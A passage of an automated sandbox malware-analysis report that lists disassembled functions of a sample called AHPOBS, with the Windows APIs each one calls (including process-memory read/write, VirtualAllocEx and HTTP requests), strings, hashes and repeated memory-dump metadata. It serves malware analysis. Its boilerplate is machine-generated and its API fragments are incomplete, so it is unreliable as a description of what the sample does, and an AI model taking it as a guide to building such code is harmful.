                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                      • String ID:
                                      • API String ID: 4247068974-0
                                      • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                      • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                      • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                      • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                      Function 0044F405 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 302COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: )$U$\
                                      • API String ID: 0-3705770531
                                      • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                      • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                      • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                      • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                      Function 0046E48D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                      • CoInitialize.OLE32(00000000), ref: 0046E505
                                      • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                      • CoUninitialize.OLE32 ref: 0046E53D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                      • String ID: .lnk
                                      • API String ID: 886957087-24824748
                                      • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                      • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                      • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                      • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                      Function 0044E180 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: \
                                      • API String ID: 4104443479-2967466578
                                      • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                      • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                      • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                      • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                      Function 0044E189 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: \
                                      • API String ID: 4104443479-2967466578
                                      • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                      • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                      • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                      • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                      Function 0044E199 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 260COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: \
                                      • API String ID: 4104443479-2967466578
                                      • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                      • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                      • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                      • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                      Function 0046A6E1 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 241COMMON
                                      Download Yara Rule
                                      Strings
                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                      • API String ID: 708495834-557222456
                                      • Opcode ID: 3a13b15884de974d4fda4968be31590525042cec53bcb86b62071813a3441500
                                      • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                      • Opcode Fuzzy Hash: 3a13b15884de974d4fda4968be31590525042cec53bcb86b62071813a3441500
                                      • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                      Function 0043659E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 162windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                        • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                        • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                        • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                        • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                      • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                      • String ID: @
                                      • API String ID: 4150878124-2766056989
                                      • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                      • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                      • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                      • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
                                      Function 0044F137 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 161COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID: \$]$h
                                      • API String ID: 4104443479-3262404753
                                      • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                      • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                      • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                      • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                      Function 0044A856 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                        • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                      • String ID:
                                      • API String ID: 3705125965-3916222277
                                      • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                      • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                      • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                      • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                      Function 0045FA41 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                      • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                      • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Menu$Delete$InfoItem
                                      • String ID: 0
                                      • API String ID: 135850232-4108050209
                                      • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                      • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                      • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                      • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                      Function 004507B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                      • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: Window$Long
                                      • String ID: SysTreeView32
                                      • API String ID: 847901565-1698111956
                                      • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                      • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                      • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                      • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                      Function 004509D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                                      Download Yara Rule
                                      APIs
                                      • DestroyWindow.USER32(00000000), ref: 00450A2F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: DestroyWindow
                                      • String ID: msctls_updown32
                                      • API String ID: 3375834691-2298589950
                                      • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                      • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                      • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                      • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                      Function 0045D779 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ErrorMode$DiskFreeSpace
                                      • String ID: \VH
                                      • API String ID: 1682464887-234962358
                                      • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                      • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                      • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                      • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                      Function 0045D78F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_AHPOBS.jbxd
                                      Similarity
                                      • API ID: ErrorMode$DiskFreeSpace
                                      • String ID: \VH
                                      • API String ID: 1682464887-234962358
                                      • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                      • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                      • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                      • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                      Function 0045D86D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.3916459746.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.3916441592.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916514264.0000000000482000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916530188.0000000000490000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916547156.0000000000491000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.0000000000492000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916559641.00000000004A7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 0000000A.00000002.3916596880.00000000004AB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
